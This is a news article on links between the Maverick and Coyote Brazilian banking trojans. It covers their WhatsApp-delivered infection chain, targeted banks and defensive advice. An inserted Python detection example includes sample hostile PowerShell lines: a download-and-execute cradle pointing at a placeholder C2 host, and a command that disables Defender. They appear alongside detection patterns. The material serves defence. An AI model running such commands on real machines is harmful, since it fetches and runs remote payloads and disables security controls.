#1 Middle East & Africa Trusted Cybersecurity News & Magazine |
Maverick Meets Coyote: Inside the Evolving Threat of Brazilian Banking Trojans

Brazil’s financial sector has long been a hotbed for banking trojans – malware designed to steal user credentials and hijack transactions – but a new discovery suggests these threats are evolving, merging, and getting smarter.

According to CyberProof’s recent analysis, researchers identified strong connections between two notorious trojans: Maverick and Coyote. Both target Brazilian users via malicious files shared over WhatsApp, use complex PowerShell obfuscation, and share nearly identical routines for monitoring banking applications and decrypting sensitive URLs.

The investigation began when CyberProof’s Security Operations Center (SOC) detected a suspicious file download from WhatsApp Web, a common infection vector for personal and business devices. What initially appeared as an isolated incident soon revealed a deeper web of interconnected campaigns linked to ongoing Brazilian banking malware operations.

The Anatomy of the Attack

The infection chain follows a multi-stage approach:

  1. The user downloads a seemingly harmless ZIP file via web.whatsapp.com.
  2. Inside, a disguised .lnk (shortcut) file executes obfuscated PowerShell commands.
  3. The script connects to the attacker’s command-and-control (C2) server (zapgrande[.]com) to fetch the next-stage payload.
  4. Once active, the malware disables Microsoft Defender and User Account Control (UAC), then downloads encrypted modules that steal data or hijack browser sessions.

Researchers discovered that both Maverick and Coyote use identical AES + GZIP encryption methods to decrypt targeted Brazilian banking URLs, a key clue linking the two strains. They also share code structures that check for processes tied to major banks, crypto exchanges, and even WhatsApp Web, indicating broader surveillance and credential-stealing capabilities.

Notably, Maverick’s persistence is achieved through a batch file that auto-runs at startup, coded to communicate with a second C2 domain (sorvetenopote[.]com).

A Targeted Threat to Brazilian Financial Institutions

The malware’s victimology confirms it’s laser-focused on Brazilian financial platforms, including:

  • banco.bradesco, caixa.gov.br, itau.com.br, santandernetibe.com.br, banrisul.com.br, bb.com.br, and mercadobitcoin.com.br.
  • Popular crypto trading sites such as Binance and Blockchain.com are also in the crosshairs.

Maverick first verifies whether the victim is located in Brazil before activating. If not, it self-terminates, a tactic used to avoid global detection and sandbox analysis. Once active, it communicates with attacker servers to receive commands, exfiltrate credentials, and potentially perform fileless execution using PowerShell in memory, making detection extremely challenging.

CyberProof’s analysis highlights that Maverick and Coyote may share not just techniques, but also developers or operational control, suggesting an evolution from isolated malware projects into coordinated cybercrime ecosystems.

Why It Matters Globally, and in the MEA Region

While the current wave targets Brazil, this kind of modular banking malware has a history of crossing borders. Once attackers validate techniques locally, they often retool them for other markets, including the Middle East and Africa, where mobile banking adoption is rising rapidly.

With many GCC and African banks expanding digital services, similar attacks could emerge, leveraging messaging apps like WhatsApp or Telegram as infection vectors. As these apps blur personal and business communications, the risk extends from individual users to enterprise endpoints.

10 Best Practices for Defenders

To mitigate risks from trojans like Maverick and Coyote, security teams should:

  1. Educate employees about malicious attachments and links, especially those arriving through messaging platforms.
  2. Restrict file downloads from personal communication channels on corporate networks.
  3. Monitor PowerShell activity for obfuscated or encoded commands.
  4. Enforce endpoint protection policies that block unsigned scripts and suspicious processes.
  5. Deploy behavioral detection tools that flag abnormal use of cmd.exe and powershell.exe.
  6. Segment networks to isolate infected endpoints quickly.
  7. Apply strict access controls for data transfers and USB devices.
  8. Leverage threat intelligence feeds (such as Saintynet Cybersecurity) to track emerging banking malware IOCs.
  9. Regularly patch systems and browsers to eliminate vulnerabilities exploited by loaders.
  10. Conduct simulated phishing and infection response drills to strengthen SOC readiness.
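One way to put recommendations 3 and 5 into practice against the infection chain described earlier (PowerShell launched from a shortcut, encoded commands, Defender and UAC tampering) is a small triage routine over process-creation events. This is an added example, not code from the article or from CyberProof; the sample events, the parent-process list and the pattern lists are constructed assumptions, and a real deployment would read events from Sysmon Event ID 1 or Windows 4688 logs instead.

```python
import base64
import re

# Constructed sample process-creation events (hypothetical, not from the report).
def encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand expects base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",   # .lnk opened from a download folder
     "cmdline": "powershell.exe -NoP -W Hidden -Ep Bypass -EncodedCommand "
                + encode_ps("IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/stage2')")},
    {"parent": "cmd.exe", "image": "powershell.exe",        # batch-driven Defender tampering
     "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"parent": "services.exe", "image": "powershell.exe",   # scheduled admin script: should stay quiet
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]

ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_SWITCHES = {"-nop": "no profile", "-w hidden": "hidden window", "-ep bypass": "execution policy bypass"}
PAYLOAD_PATTERNS = {   # applied to lower-cased text, so no re.I needed
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"),
    "in-memory execution": re.compile(r"\biex\b|invoke-expression"),
    "defender tampering": re.compile(r"set-mppreference|add-mppreference"),
    "uac tampering": re.compile(r"enablelua"),
}
USER_SHELL_PARENTS = {"explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe"}

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event: dict) -> list:
    """Collect detection findings for one process-creation event."""
    findings = []
    text = event["cmdline"].lower()
    if event["image"].lower() == "powershell.exe" and event["parent"].lower() in USER_SHELL_PARENTS:
        findings.append("powershell spawned from user shell")
    findings += [label for flag, label in SUSPICIOUS_SWITCHES.items() if flag in text]
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded command")
        text += " " + decoded.lower()   # inspect the decoded script as well as the launcher
    findings += [label for label, pat in PAYLOAD_PATTERNS.items() if pat.search(text)]
    return findings

def verdict(event: dict) -> str:
    n = len(analyze(event))
    return "alert" if n >= 2 else "review" if n == 1 else "benign"
```

The thresholds in `verdict` are deliberately simple; in production the findings would feed a SIEM rule that also weighs the parent process and the user context.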

The Bigger Picture

Maverick and Coyote are part of a larger pattern: banking trojans are becoming more modular, stealthy, and collaborative. As AI-driven automation enters the attacker’s toolkit, analysts predict more sophisticated versions could surface, blending information-stealing, ransomware, and even social engineering functions.

According to CyberProof, the overlap between these two malware families underscores the growing industrialization of cybercrime, where shared codebases and tools are traded across underground ecosystems.

For security professionals in Brazil and beyond, the message is clear: malware doesn’t stay local for long. Strengthening defenses now – from endpoint visibility to user awareness – is key to staying ahead of evolving threats.

Conclusion

The link between Maverick and Coyote represents more than just shared code; it’s a sign that financial malware operations are maturing, combining stealth, social engineering, and technical innovation.

Organizations worldwide, particularly across emerging digital economies like the Middle East and Africa, must recognize this evolution and respond with equally adaptive security strategies.

Stay informed, stay resilient, and invest in continuous cybersecurity training, because the next variant could already be in development.

Source: CyberProof – “Analyzing the Link Between Two Evolving Brazilian Banking Trojans”

Ouaissou DEMBELE